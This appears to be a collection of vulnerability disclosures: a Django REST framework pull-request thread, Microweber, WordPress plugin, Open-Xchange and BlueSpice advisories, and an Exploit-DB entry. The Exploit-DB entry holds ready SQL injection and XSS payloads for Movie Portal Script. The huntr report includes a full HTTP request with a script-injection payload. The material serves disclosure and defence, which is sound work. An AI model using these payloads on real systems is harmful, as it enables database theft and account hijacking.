Django REST framework (aka django-rest-framework) before 3.9.1 allows XSS because the default DRF Browsable API view templates disable autoescaping.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Conversation 15 Commits 1 Checks 0 Files changed

**Conversation**

Copy link

Contributor

** **dkliban** commented Sep 17, 2018 •**

Solution: set needs\_autoescape=True when registering the filter

Without this patch, the disabling autoescape in the template does not work.

refs #6201

Hi @dkliban. Can you please add a failing test case (with your example from #6201) to go with this change? Thanks.

Solution: set needs\_autoescape=True when registering the filter

Without this patch, the disabling autoescape in the template does not work.

Copy link

Contributor Author

** **dkliban** commented Oct 2, 2018**

@carltongibson I've added a test. It fails when I remove my patch and passes with it. Can you think of a better name for the test?

Copy link

Member

** **rpkilby** left a comment**

Thanks @dkliban. Confirmed on my end that the test does fail without the fix.

Copy link

Contributor

** **zyv** commented Nov 21, 2018**

@dkliban unfortunately, after your fix the browsable API became unusable if the response contains HTML, because it is now unescaped, as autoescape is off in base.html, but if autoescape is turned on in the template, then the content is escaped twice - first in the function, and then outside.

    class TestViewSet(GenericViewSet):
        def list(self, request):
            return Response({"a": "<h1>badmarker</h1> - https://www.google.com"})
    

is now rendered like this (wrong)

    {
        "a": "<h1>badmarker</h1> - <a href="https://www.google.com" rel="nofollow">https://www.google.com</a>"
    }
    

instead of this (right)

    {
        &quot;a&quot;: &quot;&lt;h1&gt;badmarker&lt;/h1&gt; - <a href="https://www.google.com" rel="nofollow">https://www.google.com</a>&quot;
    }
    

I don't quite understand from your test, what was your motivation to change this function to respect autoescape behaviour? As the other test shows, before your change it was working correctly with browsable API...

/cc @carltongibson

@zyv can you open a PR adding your test case? It may be we need to revert this, but let’s have a look at it.

Copy link

Contributor Author

** **dkliban** commented Nov 21, 2018**

@dkliban thanks for the feedback. This fix may only highlight another issue. We'll have a closer look at it with a failing test case.

 zyv mentioned this pull request

Nov 21, 2018

Copy link

Contributor

** **zyv** commented Nov 21, 2018**

@dkliban thank you for the explanation! I currently believe that you were misled by the parameter name and it was never supposed to adhere to the API in the first place, it's just that the parameter name is confusing, but that's only my working theory. I will hopefully have a look into your case as time permits.

@carltongibson thanks for chiming in, I have opened a new PR with a test that demonstrates the issue.

Copy link

Contributor

** **sloria** commented Nov 29, 2018**

We ran into the issue @zyv described above (HTML getting rendered in the browseable API) and have to downgrade to 3.8.2. Perhaps this change should get reverted for now, until a proper fix for the OP is found.

Copy link

Contributor

** **zyv** commented Dec 1, 2018**

I'm a bit worried that there haven't been any visible progress on #6330 so far, given that it's a gaping XSS hole for anyone using Browsable API and returning user-entered data as a part of the response.

I second the opinion of @sloria, that maybe if a proper fix has proved to be challenging, it would be great to merge #6330, revert #6191 and make a 3.9.1 bugfix release... Thanks!

Thanks for your concern @zyv. The issue is just time to examine it properly rather than it looking particularly difficult. Reverting is one option, but we need to make sure that’s the correct option before just rushing on. And that needs capacity, which can take a while in an open source project.

You’re welcome to take it on yourself if you like.

Or, if you’re in a desperate rush, you can momentarily fork and revert, and then deploy your fork, using Pip’s excellent VCS support.

Failing either of those, we’ll get to it.

Copy link

Contributor

** **zyv** commented Dec 10, 2018**

Ach - sorry for the long response time. I had started writing something out but then got distracted.

I've replied to the PR with some thoughts.

Copy link

Contributor

** **zyv** commented Dec 14, 2018**

I think I've found a correct solution to the problem in #6330 and I would appreciate your feedback @sloria @dkliban .

pchiquet pushed a commit to pchiquet/django-rest-framework that referenced this issue

Nov 17, 2020

…ncode#6191)

Solution: set needs\_autoescape=True when registering the filter

Without this patch, the disabling autoescape in the template does not work.

CVE-2018-25045: Problem: autoescape not getting passed to urlize_quoted_links filter by dkliban · Pull Request #6191 · encode/django-rest-framework

Microwerber prior to version 1.2.20 is vulnerable to stored Cross-site Scripting (XSS).

**Microweber Stored Cross-site Scripting before v1.2.20**

Moderate severity GitHub Reviewed Published Jul 23, 2022 • Updated Jul 29, 2022

GHSA-xg72-6c83-ghh4: Microweber Stored Cross-site Scripting before v1.2.20

Microweber prior to 1.2.21 is vulnerable to reflected cross-site scripting (XSS).

**Microweber before 1.2.21 vulnerable to reflected XSS**

Moderate severity GitHub Reviewed Published Jul 23, 2022 • Updated Jul 27, 2022

GHSA-cfcg-2qgr-v243: Microweber before 1.2.21 vulnerable to reflected XSS

A vulnerability was found in Itech Movie Portal Script 7.36. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /show_news.php. The manipulation of the argument id with the input AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) leads to sql injection (Error). The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

**Movie Portal Script 7.36 - Multiple Vulnerabilities**

**Platform:****PHP**

**Date:****2017-01-25**

  

    Exploit Title : Movie Portal Script v7.36 - Multiple Vulnerability
    Google Dork :    -
    Date : 20/01/2017
    Exploit Author : Marc Castejon <marc@silentbreach.com>
    Vendor Homepage : http://itechscripts.com/movie-portal-script/
    Software Link: http://movie-portal.itechscripts.com
    Type : webapps
    Platform: PHP
    Sofware Price and Demo : $250
    
    ------------------------------------------------
    Type: Error Based Sql Injection
    Vulnerable URL:http://localhost/[PATH]/show_news.php
    Vulnerable Parameters: id
    Method: GET
    Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
    (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    
    -----------------------------------------------
    Type: Reflected XSS
    Vulnerable URL: http://localhost/[PATH]/movie.php
    Vulnerable Parameters : f=
    Payload:<img src=i onerror=prompt(1)>
    ---------------------------------------------
    Type: Error Based Sql Injection
    Vulnerable URL:http://localhost/[PATH]/show_misc_video.php
    Vulnerable Parameters: id
    Method: GET
    Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
    (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    -----------------------------------------------
    
    Type:Union Query Sql Injection
    Vulnerable URL:http://localhost/[PATH]/movie.php
    Vulnerable Parameters: f
    Method: GET
    Payload:  -4594 UNION ALL SELECT
    NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7871,0x6452766b715a73727a634a497a7370474e6744576c737a6a436a6e566e546c68425a4b426a53544d,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    -----------------------------------------------
    Type: Union Query Sql Injection
    Vulnerable URL:http://localhost/[PATH]/artist-display.php
    Vulnerable Parameters: act
    Method: GET
    Payload:  UNION ALL SELECT
    NULL,CONCAT(0x71706a7871,0x6b704f42447249656672596d4851736d486b45414a53714158786549644646716377666471545553,0x717a6a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    -----------------------------------------------
    
    Type: Error Based Sql Injection
    Vulnerable URL:http://localhost/[PATH]/film-rating.php
    Vulnerable Parameters: v
    Method: GET
    Payload:  AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT
    (ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM
    INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

CVE-2017-20139: Offensive Security’s Exploit Database Archive

Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerability in Chinmoy Paul's Testimonials plugin <= 3.0.1 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of July 19, 2022 and is not available for download. This closure is temporary, pending a full review.

I downloaded this hoping to save some time in displaying a few testimonials. However, the content in each p tag would run off the page. I didn't feel like digging too far into the css or what the possible conflict could be (I'm using Inuit). If you leave any fields unused, such as business link or business name, the plugin leaves the space empty, that would be used by those fields. It should at least check to see if they're empty. 2 stars because it could be an issue with Inuit but I don't think it is.

Read all 4 reviews

“Testimonials” is open source software. The following people have contributed to this plugin.

Contributors

*    chinmoy29

CVE-2022-33191: Testimonials

Multiple Authenticated (contributor or higher user role) Stored Cross-Site Scripting (XSS) vulnerabilities in wpWax Team plugin <= 1.2.6 at WordPress.

*   Details
*   Reviews
*   Support
*   Development

This plugin has been closed as of May 3, 2022 and is not available for download. Reason: Licensing/Trademark Violation.

I looked through plenty of plugins to display our team the way I wanted and there was always something missing. This one has it all: a great grid, pop-up more info on each person, nicely displayed social icons, additional fields for skills and more info. Really cool and super easy to use! The only two little things that were missing in our experience were: 1) some customisable features are not responsive (like font size of colour, even in the pro version) 2) we needed some additional customisation, like removing animation, changing titles of additional fields, etc. The plug-in support has helped us with everything adding code directly on the site! Super helpful and nice, definitely recommended 🙂

The plugin has several options with which one can modify the look of it. I especially want to complement the great support I got. I asked whether it would be possible to get a new feature to the plugin and it didn't take long and they had updated the plugin to include the requested feature. Great plugin and a great team behind it!

Read all 2 reviews

“Team” is open source software. The following people have contributed to this plugin.

Contributors

*    wpWax

CVE-2022-34650: Team

Open-Xchange App Suite versions 7.10.6 and below suffer from OS command injection and cross site scripting vulnerabilities. One particular cross site scripting issue only affects versions 7.10.5 and below.

Product: OX App Suite  
Vendor: OX Software GmbH

Internal reference: DOCS-4106  
Vulnerability type: OS Command Injection (CWE-78)  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: documentconverter  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev13, 7.10.3-rev6, 7.10.4-rev6, 7.10.5-rev5, 7.10.6-rev3  
Vendor notification: 2022-01-10  
Solution date: 2022-01-13  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-23100  
CVSS: 8.2 (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L)

Vulnerability Details:  
OX Documentconverter has a Remote Code Execution flaw that allows authenticated OX App Suite users to run commands on the instance which runs OX Documentconverter if they have the ability to perform document conversions, for example of E-Mail attachments or OX Drive content.

Risk:  
Attackers can inject arbitrary operating-system level commands via OX App Suite API and/or OX Documentconverter API. Commands are executed on the instance running OX Documentconverter, based on "open-xchange" user privileges. This can be used to modify or exfiltrate configuration files as well as adversely affect the instances availability by excessive resource usage. By default the vulnerable Documentconverter API is not publicly accessible, however this might be worked around by abusing other weaknesses, configuration flaws or social engineering.

Steps to reproduce:  
1. Create a forged Documentconverter API call that embeds escape characters and a system command  
2. Inject the malicious API call via App Suite as a proxy or other means

Solution:  
We reduceed available API parameters to a limited set of enumerations, rather than accepting API input.

---

Internal reference: MWB-1350  
Vulnerability type: Cross-Site Scripting (CWE-80)  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: backend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev78, 7.10.3-rev38, 7.10.4-rev31, 7.10.5-rev37, 7.10.6-rev9  
Vendor notification: 2021-11-30  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-23099  
CVSS: 3.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:  
Existing sanitization and filtering mechanisms for HTML files can be bypassed by forcing block-wise read. Using this technique, the recognition procedure misses to detect tags and attributes that span multiple blocks.

Risk:  
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require the victim to follow a hyperlink.

Steps to reproduce:  
1. As attacker, create a HTML malicious code-snippet which masks tags (e.g. <script>) by block boundaries  
2. Upload the code snippet to drive and create a sharing link  
3. Sent that link to a victim and make it follow it

Solution:  
We now check for possible HTML content through overlapping reads from data streams.

---

Internal reference: MWB-1366  
Vulnerability type: n/a  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: middleware  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev78, 7.10.3-rev38, 7.10.4-rev31, 7.10.5-rev38, 7.10.6-rev9  
Vendor notification: 2021-12-10  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2021-42550  
CVSS: n/a

Vulnerability Details:  
In the wake of the CVE-2021-44228 (Log4Shell) issue, a similar potential vulnerability at the Logback library has been identified (LOGBACK-1591, CVE-2021-42550). At its default configuration, OX App Suite is not susceptible to this vulnerability and there are no scenarios that require to deploy a vulnerable configuration.

Risk:  
We provide this update strictly as a precaution to mitigate the possibility of a vulnerability. Exploiting CVE-2021-42550 at this point would require privileged access to alter system configuration.

Steps to reproduce:  
1. n/a

Solution:  
We provided a component update to Logback 1.2.8 and slf4j 1.7.32.

---

Internal reference: OXUIB-1172  
Vulnerability type: Cross-Site Scripting (CWE-80)  
Vulnerable version: 7.10.5 and earlier  
Vulnerable component: frontend  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev69, 7.10.3-rev31, 7.10.4-rev28, 7.10.5-rev30  
Vendor notification: 2021-11-30  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-23101  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

Vulnerability Details:  
Deep-links within E-Mail (e.g. links to Drive files) are not checked for malicious use of the appHandler function (see CVE-2021-38374) and may therefore be used to inject references to malicious code.

Risk:  
Malicious script code can be executed within a users context. This can lead to session hijacking or triggering unwanted actions via the web interface (e.g. redirecting to a third-party site). To exploit this an attacker would require to forge App Suite specific mails and force the victim to follow a hyperlink.

Steps to reproduce:  
1. As an attacker, create a malicious E-Mail that uses App Suite "Deep-links" as mail header and embed a call to the AppLoader component  
2. Deliver the mail and make the victim open the link

Proof of concept:  
X-Open-Xchange-Share-URL: https://example.com/#!!&app=%2e./%2e./%2e./%2e./%2e./%2e./appsuite/drive/script.js?cut=&id=123

Solution:  
We now check for a enumeration of valid applications for deep-links as well.

---

Internal reference: DOCS-4161  
Vulnerability type: OS Command Injection (CWE-78)  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: documentconverter  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev14, 7.10.3-rev7, 7.10.4-rev7, 7.10.5-rev6, 7.10.6-rev3  
Vendor notification: 2022-01-24  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-24405  
CVSS: 7.3 (CVSS:3.1/AV:A/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:N)

Vulnerability Details:  
The compatibility layer of documentconverter API processes serialized Java classes when using remote cache calls. This can be exploited to inject malicious code that is being executed in the context of the documentconverter component.

Risk:  
Attackers can inject arbitrary operating-system level commands via the OX Documentconverter API. Commands are executed on the instance running OX Documentconverter, based on "open-xchange" user privileges. This can be used to modify or exfiltrate configuration files as well as adversely affect the instances availability by excessive resource usage. By default the vulnerable OX Documentconverter API is not publicly accessible and we are not aware that this could have been exploited without privileged network or system access.

Steps to reproduce:  
1. Create a malicious Java class and serialize it  
2. Use the OX Documentconverter API to inject this class as a reference/hash to remote caches

Solution:  
We now apply input sanitization to this API call and retrict it to strings. We also implemented a set of additional hardening procedures for other API calls which work in a similar way.

---

Internal reference: DOCS-4120  
Vulnerability type: Server-Side Request Forgery (CWE-918)  
Vulnerable version: 7.10.6 and earlier  
Vulnerable component: documentconverter-api  
Report confidence: Confirmed  
Solution status: Fixed by Vendor  
Fixed version: 7.8.4-rev10, 7.10.3-rev5, 7.10.4-rev6, 7.10.5-rev6, 7.10.6-rev3  
Vendor notification: 2022-01-10  
Solution date: 2022-02-15  
Public disclosure: 2022-07-21  
CVE reference: CVE-2022-24406  
CVSS: 6.4 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)

Vulnerability Details:  
By creating colissions of HTTP multipart-formdata boundaries it is possible to alter the API request parameters between OX App Suite and OX Documentconverter. Legitimate multipart-formdata boundaries are created based on a timestamp with millisecond resolution. This allows attackers to predict the next boundary and attempt to overwrite its content. The most practical way to exploit this is sending a large number of formdata parts, each with a unique boundary based on a future point in time.

Risk:  
Attackers can modify parameters of internal API calls to OX Documentconverter and by that circumvent network trust boundaries. In effect, a server-side request forgery attack is possible, for example to exploit DOCS-4106 (CVE-2022-23100) with limited privileges using OX App Suite API as a "proxy".

Steps to reproduce:  
1. Create a HTTP request with multipart-formdata boundaries representing timestamps in the near future  
2. Add internal API parameters to those multipart-formdata sections and use them as requests to OX App Suite API

Solution:  
We modified the algorithm to create multipart-formdata boundaries in a way that they are no longer predictable. We also restricted the number of multipart-formdata parts to a sensible amount and issue an Exception if a client exceeds it.

Open-Xchange App Suite 7.10.x Cross Site Scripting / Command Injection

Cross-site Scripting (XSS) vulnerability in "Extension:ExtendedSearch" of Hallo Welt! GmbH BlueSpice allows attacker to inject arbitrary HTML (XSS) on page "Special:SearchCenter", using the search term in the URL.

Date

2022-01-31

Severity

Medium

Affected

BlueSpice 3.x, BlueSpice 4.x

Fixed in

BlueSpice 3.2.9, BlueSpice 4.1.1

**Problem**

Users are able to inject arbitrary HTML (XSS) on Special:SearchCenter, using the search term. This can be triggered via URL.

**Solution**

Upgrade to BlueSpice 4.1.1

**Acknowledgements**

Special thanks to the security team of an undisclosed customer

CVE-2022-2510: Security:Security Advisories/BSSA-2022-01 - BlueSpice Wiki

Cross-site Scripting (XSS) vulnerability in the "commonuserinterface" component of BlueSpice allows an attacker to inject arbitrary HTML into a page using the title parameter of the call URL.

Date

2022-04-25

Severity

Medium

Affected

BlueSpice 4.x

Fixed in

4.1.3

**Problem**

Users are able to inject arbitrary HTML (XSS) on regular pages, using a special value for the title parameter. This can be triggered via URL.

**Solution**

Upgrade to BlueSpice 4.1.3

**Acknowledgements**

Special thanks to the security team of an undisclosed customer

CVE-2022-2511: Security:Security Advisories/BSSA-2022-02 - BlueSpice Wiki

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.21.

**Description**

Hi team, I found XSS at /module/.

**Proof of Concept**

Pop up POC: 

Reflected POC: 

Full request payload:

    POST /demo/module/ HTTP/1.1
    Host: demo.microweber.org
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Content-Length: 183
    Origin: https://demo.microweber.org
    Referer: https://demo.microweber.org/demo/shop
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: cross-site
    Te: trailers
    Connection: close
    
    type=shop%2Fcheckout&template=modal&id=js-ajax-cart');});function%20$(num1){alert(1);return%20String(num1)}$(document).ready(function%20()%20{mw.$('-checkout-process&class=no-settings
    

**Impact**

XSS

**Occurrences**

index.php L80-L92

This function does not filter 'id' parameter in script tag, which allows attackers to escape syntax using apostrophe.

Tag

#xss